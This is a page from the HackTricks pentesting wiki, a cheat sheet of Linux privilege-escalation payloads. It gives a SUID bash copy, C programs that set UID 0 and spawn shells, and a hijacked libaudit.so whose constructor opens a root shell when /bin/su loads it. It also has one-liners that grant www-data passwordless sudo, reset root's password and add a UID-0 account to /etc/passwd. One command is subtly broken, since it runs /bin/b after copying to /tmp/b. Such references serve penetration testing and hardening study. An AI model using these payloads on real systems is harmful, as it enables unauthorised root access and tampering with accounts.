payloads-to-execute.md (8342B)
1 --- 2 title: "Payloads to execute" 3 section: "Linux" 4 sectionSlug: "linux-hardening" 5 sourcePath: "src/linux-hardening/processes-crontab-systemd-dbus/payloads-to-execute.md" 6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/linux-hardening/processes-crontab-systemd-dbus/payloads-to-execute.md" 7 sha: "188de82beb54e70956b2952367a0af91d26758b8" 8 isIndex: false 9 modified: true 10 license: "CC-BY-NC-4.0" 11 --- 12 13 # Payloads to execute 14 15 ## Bash 16 17 `bash -p` enables privileged mode: when Bash starts with different real and effective IDs, it does not reset the effective ID to the real ID. The resulting shell still depends on the caller's existing credentials.<sup>[[1]](#references)[[3]](#references)</sup> 18 19 ```bash 20 cp /bin/bash /tmp/b && chmod +s /tmp/b 21 /bin/b -p #Maintains root privileges from suid, working in debian & buntu 22 ``` 23 24 ## C 25 26 `setresuid` changes the real, effective, and saved IDs when permitted, while `setuid` changes the effective ID and may also set the real and saved IDs for a privileged caller. `execve` replaces the current process image with the requested program.<sup>[[2]](#references)[[3]](#references)[[4]](#references)</sup> These examples omit return-value checks; both credential calls can fail even for UID 0.<sup>[[2]](#references)[[3]](#references)</sup> 27 28 ```c 29 //gcc payload.c -o payload 30 int main(void){ 31 setresuid(0, 0, 0); //Set as user suid user 32 system("/bin/sh"); 33 return 0; 34 } 35 ``` 36 37 ```c 38 //gcc payload.c -o payload 39 #include <stdio.h> 40 #include <unistd.h> 41 #include <sys/types.h> 42 43 int main(){ 44 setuid(getuid()); 45 system("/bin/bash"); 46 return 0; 47 } 48 ``` 49 50 ```c 51 // Privesc to user id: 1000 52 #define _GNU_SOURCE 53 #include <stdlib.h> 54 #include <unistd.h> 55 56 int main(void) { 57 char *const paramList[10] = {"/bin/bash", "-p", NULL}; 58 const int id = 1000; 59 setresuid(id, id, id); 60 execve(paramList[0], paramList, NULL); 61 return 0; 62 } 63 ``` 64 65 ## Overwriting a file to escalate privileges 66 67 ### Common files 68 69 These are common local privilege-control files and interfaces: `/etc/passwd` stores seven-field account records, `/etc/shadow` stores optional encrypted password data, `sudoers` defines sudo privileges and tags such as `NOPASSWD`, and Docker's default daemon endpoint is a Unix socket at `/var/run/docker.sock`; access to that socket can grant root-level control of its host.<sup>[[5]](#references)[[6]](#references)[[7]](#references)[[8]](#references)</sup> 70 71 - Add user with password to _/etc/passwd_ 72 - Change password inside _/etc/shadow_ 73 - Add user to sudoers in _/etc/sudoers_ 74 - Abuse docker through the docker socket, usually in _/run/docker.sock_ or _/var/run/docker.sock_ 75 76 ### Overwriting a library 77 78 Check which shared libraries a binary uses; in this example, inspect `/bin/su` with `ldd`.<sup>[[9]](#references)</sup> 79 80 ```bash 81 ldd /bin/su 82 linux-vdso.so.1 (0x00007ffef06e9000) 83 libpam.so.0 => /lib/x86_64-linux-gnu/libpam.so.0 (0x00007fe473676000) 84 libpam_misc.so.0 => /lib/x86_64-linux-gnu/libpam_misc.so.0 (0x00007fe473472000) 85 libaudit.so.1 => /lib/x86_64-linux-gnu/libaudit.so.1 (0x00007fe473249000) 86 libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007fe472e58000) 87 libdl.so.2 => /lib/x86_64-linux-gnu/libdl.so.2 (0x00007fe472c54000) 88 libcap-ng.so.0 => /lib/x86_64-linux-gnu/libcap-ng.so.0 (0x00007fe472a4f000) 89 /lib64/ld-linux-x86-64.so.2 (0x00007fe473a93000) 90 ``` 91 92 `ldd` reports shared-object dependencies, while the dynamic linker uses ELF metadata and its search rules to load them at runtime.<sup>[[9]](#references)[[10]](#references)</sup> 93 94 To inspect one candidate, use `objdump -T` to print the dynamic symbol table of `su` and filter for audit names.<sup>[[11]](#references)</sup> 95 96 ```bash 97 objdump -T /bin/su | grep audit 98 0000000000000000 DF *UND* 0000000000000000 audit_open 99 0000000000000000 DF *UND* 0000000000000000 audit_log_user_message 100 0000000000000000 DF *UND* 0000000000000000 audit_log_acct_message 101 000000000020e968 g DO .bss 0000000000000004 Base audit_fd 102 ``` 103 104 `audit_open`, `audit_log_user_message`, and `audit_log_acct_message` are libaudit functions; `audit_fd` is shown as a data object defined in `su`'s `.bss` in this output.<sup>[[12]](#references)[[13]](#references)[[14]](#references)</sup> A replacement library must export compatible definitions for the undefined symbols that the loader resolves; mismatched function/data ABIs can still make the process fail when those symbols are relocated or called.<sup>[[10]](#references)[[11]](#references)</sup> 105 106 GCC's `constructor` attribute causes `inject` to be called automatically before `main` on supported targets.<sup>[[15]](#references)</sup> 107 108 ```c 109 #include<stdio.h> 110 #include<stdlib.h> 111 #include<unistd.h> 112 113 //gcc -shared -o /lib/x86_64-linux-gnu/libaudit.so.1 -fPIC inject.c 114 115 int audit_open; 116 int audit_log_acct_message; 117 int audit_log_user_message; 118 int audit_fd; 119 120 void inject()__attribute__((constructor)); 121 122 void inject() 123 { 124 setuid(0); 125 setgid(0); 126 system("/bin/bash"); 127 } 128 ``` 129 130 If the replacement is loaded successfully by a privileged **`/bin/su`** process, this constructor can start **`/bin/bash`** with that process's privileges; the exact result is environment-dependent.<sup>[[10]](#references)[[15]](#references)</sup> 131 132 ## Scripts 133 134 Can you make root execute something? 135 136 `sudoers` uses the `NOPASSWD` tag in policy entries, `chpasswd` reads `user:password` pairs from standard input, and `/etc/passwd` uses seven colon-separated account fields; the following examples assume the relevant files are writable by the process that runs them.<sup>[[5]](#references)[[6]](#references)[[16]](#references)</sup> 137 138 ### **www-data to sudoers** 139 140 ```bash 141 echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD:ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update 142 ``` 143 144 ### **Change root password** 145 146 ```bash 147 echo "root:hacked" | chpasswd 148 ``` 149 150 ### Add new root user to /etc/passwd 151 152 The final payload depends on a target that accepts the generated `crypt` hash: Debian's `mkpasswd -m sha-512` maps to SHA-512 crypt (`$6$`), while OpenSSL's `passwd -1 -salt` uses the MD5-based BSD algorithm (`$1$`).<sup>[[17]](#references)[[18]](#references)</sup> 153 154 ```bash 155 echo hacker:$((mkpasswd -m SHA-512 myhackerpass || openssl passwd -1 -salt mysalt myhackerpass || echo '$1$mysalt$7DTZJIc9s6z60L6aj0Sui.') 2>/dev/null):0:0::/:/bin/bash >> /etc/passwd 156 ``` 157 158 ## References 159 160 - [1] [The Set Builtin (Bash Reference Manual)](https://www.gnu.org/s/bash/manual/html_node/The-Set-Builtin.html) 161 - [2] [setresuid(2) — Linux manual page](https://man7.org/linux/man-pages/man2/setresuid.2.html) 162 - [3] [setuid(2) — Linux manual page](https://man7.org/linux/man-pages/man2/setuid.2.html) 163 - [4] [execve(2) — Linux manual page](https://man7.org/linux/man-pages/man2/execve.2.html) 164 - [5] [passwd(5) — Linux manual page](https://man7.org/linux/man-pages/man5/passwd.5.html) 165 - [6] [sudoers(5) — Debian Manpages](https://manpages.debian.org/testing/sudo/sudoers.5.en.html) 166 - [7] [Protect the Docker daemon socket](https://docs.docker.com/engine/security/protect-access/) 167 - [8] [dockerd — Docker Docs](https://docs.docker.com/reference/cli/dockerd/) 168 - [9] [ldd(1) — Linux manual page](https://man7.org/linux/man-pages/man1/ldd.1.html) 169 - [10] [ld.so(8) — Linux manual page](https://man7.org/linux/man-pages/man8/ld.so.8.html) 170 - [11] [objdump (GNU Binary Utilities)](https://sourceware.org/binutils/docs/binutils/objdump.html) 171 - [12] [audit_open(3) — Debian Manpages](https://manpages.debian.org/trixie/libaudit-dev/audit_open.3.en.html) 172 - [13] [audit_log_user_message(3) — Debian Manpages](https://manpages.debian.org/testing/libaudit-dev/audit_log_user_message.3.en.html) 173 - [14] [audit_log_acct_message(3) — Debian Manpages](https://manpages.debian.org/testing/libaudit-dev/audit_log_acct_message.3.en.html) 174 - [15] [Common Attributes (Using the GNU Compiler Collection)](https://gcc.gnu.org/onlinedocs/gcc/Common-Attributes.html) 175 - [16] [chpasswd(8) — Linux manual page](https://man7.org/linux/man-pages/man8/chpasswd.8.html) 176 - [17] [mkpasswd.c — Debian Sources](https://sources.debian.org/src/whois/5.5.17/mkpasswd.c) 177 - [18] [openssl-passwd — OpenSSL Documentation](https://docs.openssl.org/master/man1/openssl-passwd/)